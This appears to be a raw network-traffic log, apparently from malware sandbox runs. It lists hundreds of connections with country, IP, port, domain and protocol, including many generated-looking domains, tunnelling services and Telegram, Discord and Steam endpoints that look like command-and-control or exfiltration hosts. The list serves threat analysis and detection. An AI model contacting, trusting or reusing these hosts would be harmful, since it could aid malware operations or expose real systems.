FR 142.250.75.238:443 drive.google.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
DE 116.203.10.31:443 grahm.xyz tcp
DE 185.218.125.157:21441 tcp
DE 116.203.10.31:443 grahm.xyz tcp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 162.159.135.234:443 gateway.discord.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 162.159.136.232:443 discord.com tcp
US 34.117.59.81:443 ipinfo.io tcp
DE 185.218.125.157:21441 tcp
DE 101.99.92.189:8080 tcp
US 8.8.8.8:53 189.92.99.101.in-addr.arpa udp
US 8.8.8.8:53 mysql682.loopia.se udp
DE 185.218.125.157:21441 tcp
SE 93.188.1.8:3306 mysql682.loopia.se tcp
RS 79.101.0.33:3306 tcp
US 34.117.59.81:443 ipinfo.io tcp
DE 159.89.102.253:443 geolocation-db.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 8.1.188.93.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ftpcluster.loopia.se udp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 resinedyw.sbs udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 mathcucom.sbs udp
US 8.8.8.8:53 allocatinow.sbs udp
US 8.8.8.8:53 enlargkiw.sbs udp
NL 149.154.167.220:443 api.telegram.org tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
DE 185.218.125.157:21441 tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 162.159.136.232:443 discord.com tcp
SE 93.188.1.110:21 ftpcluster.loopia.se tcp
US 8.8.8.8:53 vennurviot.sbs udp
DE 116.203.10.31:443 grahm.xyz tcp
SE 93.188.1.110:52205 ftpcluster.loopia.se tcp
SE 93.188.1.110:65250 ftpcluster.loopia.se tcp
US 8.8.8.8:53 ehticsprocw.sbs udp
US 8.8.8.8:53 condifendteu.sbs udp
US 8.8.8.8:53 drawwyobstacw.sbs udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.124.170.33:443 steamcommunity.com tcp
DE 185.218.125.157:21441 tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 33.170.124.104.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 drive-connect.cyou udp
US 104.21.79.7:443 drive-connect.cyou tcp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 7.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
DE 116.203.10.31:443 grahm.xyz tcp
SE 93.188.1.110:49576 ftpcluster.loopia.se tcp
RS 79.101.0.33:3306 tcp
US 8.8.8.8:53 funletters.net udp
US 208.122.221.162:80 funletters.net tcp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 162.221.122.208.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 8.8.8.8:53 dare-curbys.biz udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 print-vexer.biz udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 mysql679.loopia.se udp
DE 116.203.10.31:443 grahm.xyz tcp
SE 93.188.1.5:3306 mysql679.loopia.se tcp
US 8.8.8.8:53 impend-differ.biz udp
GB 104.124.170.33:443 steamcommunity.com tcp
US 8.8.8.8:53 5.1.188.93.in-addr.arpa udp
DE 116.203.10.31:443 grahm.xyz tcp
US 172.67.216.167:443 infect-crackle.cyou tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
NL 38.180.123.95:3232 tcp
US 8.8.8.8:53 impend-differ.biz udp
GB 104.124.170.33:443 steamcommunity.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 a1059592.xsph.ru udp
RU 141.8.192.138:80 a1059592.xsph.ru tcp
US 8.8.8.8:53 138.192.8.141.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 f1043947.xsph.ru udp
RU 141.8.192.151:80 f1043947.xsph.ru tcp
US 8.8.8.8:53 151.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 a1051707.xsph.ru udp
RU 141.8.192.217:80 a1051707.xsph.ru tcp
US 8.8.8.8:53 www.funletters.net udp
US 208.122.221.162:80 www.funletters.net tcp
US 208.122.221.162:80 www.funletters.net tcp
RU 141.8.192.138:80 a1059592.xsph.ru tcp
US 8.8.8.8:53 217.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 httpbin.org udp
US 44.206.71.62:443 httpbin.org tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 208.122.221.162:80 www.funletters.net tcp
US 208.122.221.162:80 www.funletters.net tcp
US 208.122.221.162:80 www.funletters.net tcp
US 208.122.221.162:80 www.funletters.net tcp
US 8.8.8.8:53 acpressions.com udp
FR 142.250.75.226:80 pagead2.googlesyndication.com tcp
US 104.21.77.241:80 acpressions.com tcp
US 8.8.8.8:53 62.71.206.44.in-addr.arpa udp
US 8.8.8.8:53 home.fvtekx5vs.top udp
US 104.21.77.241:443 acpressions.com tcp
US 8.8.8.8:53 gstatic.com udp
FR 142.250.75.227:443 gstatic.com tcp
US 8.8.8.8:53 241.77.21.104.in-addr.arpa udp
US 8.8.8.8:53 226.75.250.142.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 227.75.250.142.in-addr.arpa udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
RU 31.41.244.9:80 31.41.244.9 tcp
DE 185.218.125.157:21441 tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 funletters.net udp
US 8.8.8.8:53 smileycons.com udp
US 8.8.8.8:53 thundercloud.net udp
US 8.8.8.8:53 www.smileycons.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
FR 216.58.214.66:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 172.67.213.48:443 fightlsoser.click tcp
US 8.8.8.8:53 66.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
RU 176.113.115.19:80 176.113.115.19 tcp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 19.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 www.speak-a-message.com udp
DE 195.201.119.163:80 www.speak-a-message.com tcp
US 8.8.8.8:53 155.143.214.23.in-addr.arpa udp
US 8.8.8.8:53 163.119.201.195.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 jrqh-hk.com udp
CN 123.136.92.99:80 jrqh-hk.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 bitbucket.org udp
US 8.8.8.8:53 99.92.136.123.in-addr.arpa udp
IE 185.166.142.22:443 bitbucket.org tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 3.5.25.167:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 22.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 167.25.5.3.in-addr.arpa udp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 92.65.42.20.in-addr.arpa udp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 login-donor.gl.at.ply.gg udp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 thundercloud.net udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
US 8.8.8.8:53 www.funletters.net udp
FR 142.250.179.66:443 ep1.adtrafficquality.google tcp
US 208.122.221.162:80 www.funletters.net tcp
DE 185.218.125.157:21441 tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 66.179.250.142.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 updates.signiant.com udp
DE 13.32.121.30:80 updates.signiant.com tcp
US 8.8.8.8:53 30.121.32.13.in-addr.arpa udp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
FR 142.250.178.129:443 ep2.adtrafficquality.google tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 www.hootech.com udp
US 107.191.125.184:80 www.hootech.com tcp
US 8.8.8.8:53 129.178.250.142.in-addr.arpa udp
FR 142.250.178.129:443 ep2.adtrafficquality.google udp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
US 8.8.8.8:53 portals.mediashuttle.com udp
US 8.8.8.8:53 184.125.191.107.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 76.223.25.251:443 portals.mediashuttle.com tcp
US 8.8.8.8:53 251.25.223.76.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 31.41.244.10:80 31.41.244.10 tcp
US 8.8.8.8:53 infect-crackle.cyou udp
US 172.67.216.167:443 infect-crackle.cyou tcp
US 8.8.8.8:53 caca.vercel.app udp
US 64.29.17.193:443 caca.vercel.app tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 193.17.29.64.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
US 8.8.8.8:53 162.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 webcdn.triongames.com udp
US 8.8.8.8:53 VIPEEK1990-25013.portmap.host udp
US 2.21.72.134:80 webcdn.triongames.com tcp
CN 123.129.219.191:1582 tcp
NL 38.180.123.95:3232 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 8.8.8.8:53 aukuqiksseyscgie.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 wpurl.wpqh.cc udp
HK 47.238.194.17:443 wpurl.wpqh.cc tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 87.120.84.32:80 87.120.84.32 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 147.68.81.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 17.194.238.47.in-addr.arpa udp
US 8.8.8.8:53 32.84.120.87.in-addr.arpa udp
US 20.83.148.22:80 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:8085 195.230.23.72 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 72.23.230.195.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
RU 185.81.68.147:1912 tcp
US 8.8.8.8:53 download.microsoft.com udp
SE 2.21.189.207:80 download.microsoft.com tcp
US 8.8.8.8:53 207.189.21.2.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
FR 142.250.178.129:443 ep2.adtrafficquality.google tcp
BG 195.230.23.72:8085 195.230.23.72 tcp
FR 142.250.178.129:443 ep2.adtrafficquality.google tcp
RU 185.215.113.43:80 185.215.113.43 tcp
DE 185.218.125.157:21441 tcp
SE 2.21.189.207:443 download.microsoft.com tcp
US 8.8.8.8:53 get.geojs.io udp
US 104.26.0.100:443 get.geojs.io tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 100.0.26.104.in-addr.arpa udp
US 8.8.8.8:53 43.113.215.185.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 94.156.177.133:7000 tcp
US 8.8.8.8:53 133.177.156.94.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 154.216.17.90:80 tcp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
SE 2.21.189.207:80 download.microsoft.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
SE 2.21.189.207:443 download.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
BG 195.230.23.72:8085 195.230.23.72 tcp
US 208.95.112.1:80 ip-api.com tcp
DE 185.218.125.157:21441 tcp
CN 47.92.192.119:8443 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 VIPEEK1990-25013.portmap.host udp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 8.8.8.8:53 claywyaeropumps.com udp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 ikswccmqsqeswegi.xyz udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:8085 195.230.23.72 tcp
CN 47.92.192.119:8443 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 boot.net.anydesk.com udp
FR 141.95.145.210:443 boot.net.anydesk.com tcp
FR 141.95.145.210:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 relay-ad195ac5.net.anydesk.com udp
GB 57.128.141.163:443 relay-ad195ac5.net.anydesk.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 210.145.95.141.in-addr.arpa udp
US 8.8.8.8:53 163.141.128.57.in-addr.arpa udp
US 8.8.8.8:53 18.102.255.239.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
DE 185.218.125.157:21441 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 VIPEEK1990-25013.portmap.host udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
NL 38.180.123.95:3232 tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:50003 udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 rddissisifigifidi.net udp
BG 195.230.23.72:80 tcp
US 162.159.135.232:443 discord.com tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 8.8.8.8:53 educational-reform.gl.at.ply.gg udp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 clients2.google.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 peerhost59mj7i6macla65r.com udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
BG 195.230.23.72:80 tcp
NL 89.110.69.103:80 tcp
US 8.8.8.8:53 www.google.com udp
BG 195.230.23.72:80 tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 chrome.google.com udp
FR 142.250.179.78:443 chrome.google.com tcp
US 8.8.8.8:53 164.20.217.172.in-addr.arpa udp
FR 172.217.20.206:443 clients2.google.com tcp
US 20.83.148.22:80 tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
FR 172.217.20.206:443 clients2.google.com tcp
FR 172.217.20.164:443 www.google.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
IN 43.240.65.55:81 43.240.65.55 tcp
US 8.8.8.8:53 33.177.156.94.in-addr.arpa udp
US 8.8.8.8:53 78.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 234.74.250.142.in-addr.arpa udp
FR 172.217.20.164:443 www.google.com tcp
US 154.216.17.90:80 tcp
US 8.8.8.8:53 55.65.240.43.in-addr.arpa udp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
TH 165.154.184.75:80 165.154.184.75 tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
DE 212.113.107.84:80 212.113.107.84 tcp
NL 89.110.69.103:80 tcp
US 8.8.8.8:53 75.184.154.165.in-addr.arpa udp
US 8.8.8.8:53 84.107.113.212.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
TH 165.154.184.75:80 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 94.156.177.33:80 94.156.177.33 tcp
US 8.8.8.8:53 www.pornhub.com udp
US 66.254.114.41:443 www.pornhub.com tcp
US 66.254.114.41:443 www.pornhub.com tcp
CN 114.55.106.136:80 tcp
TH 165.154.184.75:80 165.154.184.75 tcp
US 8.8.8.8:53 41.114.254.66.in-addr.arpa udp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
US 8.8.8.8:53 www.grupodulcemar.pe udp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
US 8.8.8.8:53 101.57.132.161.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 twizt.net udp
RU 185.215.113.66:80 twizt.net tcp
RU 185.215.113.66:80 twizt.net tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
RU 185.215.113.66:80 twizt.net tcp
DE 185.218.125.157:21441 tcp
US 147.185.221.23:58963 login-donor.gl.at.ply.gg tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 178.132.2.10:4000 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
BG 195.230.23.72:80 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
PE 161.132.57.101:443 www.grupodulcemar.pe tcp
RU 185.215.113.66:80 twizt.net tcp
DE 185.218.125.157:21441 tcp
RU 185.215.113.84:80 185.215.113.84 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
HK 47.244.167.171:801 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 84.113.215.185.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
NL 38.180.123.95:3232 tcp
RU 185.215.113.66:80 twizt.net tcp
DE 185.218.125.157:21441 tcp
BG 195.230.23.72:80 tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 infect-crackle.cyou udp
US 104.21.45.165:443 infect-crackle.cyou tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 165.45.21.104.in-addr.arpa udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.206.64:443 covery-mover.biz tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
N/A 127.0.0.1:8777 tcp
CN 112.124.68.87:2222 tcp
DE 185.218.125.157:21441 tcp
CN 1.94.204.34:4444 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.109.209.108:80 www.update.microsoft.com tcp
RU 185.215.113.206:80 185.215.113.206 tcp
US 8.8.8.8:53 108.209.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.113.215.185.in-addr.arpa udp
US 154.216.17.90:80 tcp
US 147.185.221.22:49922 educational-reform.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
KZ 95.59.33.46:40500 tcp
MX 189.252.61.8:40500 udp
US 8.8.8.8:53 sanboxland.pro udp
GB 89.35.131.209:80 sanboxland.pro tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 8.61.252.189.in-addr.arpa udp
US 8.8.8.8:53 209.131.35.89.in-addr.arpa udp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
CN 1.94.204.34:4444 tcp
CN 112.124.68.87:2222 tcp
HK 43.226.125.43:10443 tcp
BG 195.230.23.72:80 tcp
HK 43.226.125.43:10443 tcp
BG 195.230.23.72:80 tcp
CN 39.106.152.236:11443 tcp
CN 39.106.152.236:11443 tcp
US 8.8.8.8:53 ec2-18-166-176-228.ap-east-1.compute.amazonaws.com udp
HK 18.166.176.228:443 ec2-18-166-176-228.ap-east-1.compute.amazonaws.com tcp
HK 18.166.176.228:443 ec2-18-166-176-228.ap-east-1.compute.amazonaws.com tcp
CN 124.220.180.112:2087 tcp
CN 124.220.180.112:2087 tcp
CN 59.110.136.135:380 tcp
US 8.8.8.8:53 43.125.226.43.in-addr.arpa udp
US 8.8.8.8:53 228.176.166.18.in-addr.arpa udp
NL 38.180.123.95:3232 tcp
DE 185.218.125.157:21441 tcp
US 185.200.191.124:443 aukuqiksseyscgie.xyz tcp
KZ 88.204.209.230:40500 udp
CN 59.110.136.135:380 tcp
RU 185.215.113.209:80 tcp
US 8.8.8.8:53 230.209.204.88.in-addr.arpa udp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
N/A 127.0.0.1:8777 tcp
DE 185.218.125.157:21441 tcp
DE 185.218.125.157:21441 tcp
IR 188.209.32.217:40500 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 8.8.8.8:53 adoring-lumiere.94-20-88-63.plesk.page udp
BG 195.230.23.72:80 tcp
AZ 94.20.88.63:80 adoring-lumiere.94-20-88-63.plesk.page tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 63.88.20.94.in-addr.arpa udp
US 8.8.8.8:53 paonancs.cn udp
CA 158.69.12.143:7771 camp.zapto.org tcp
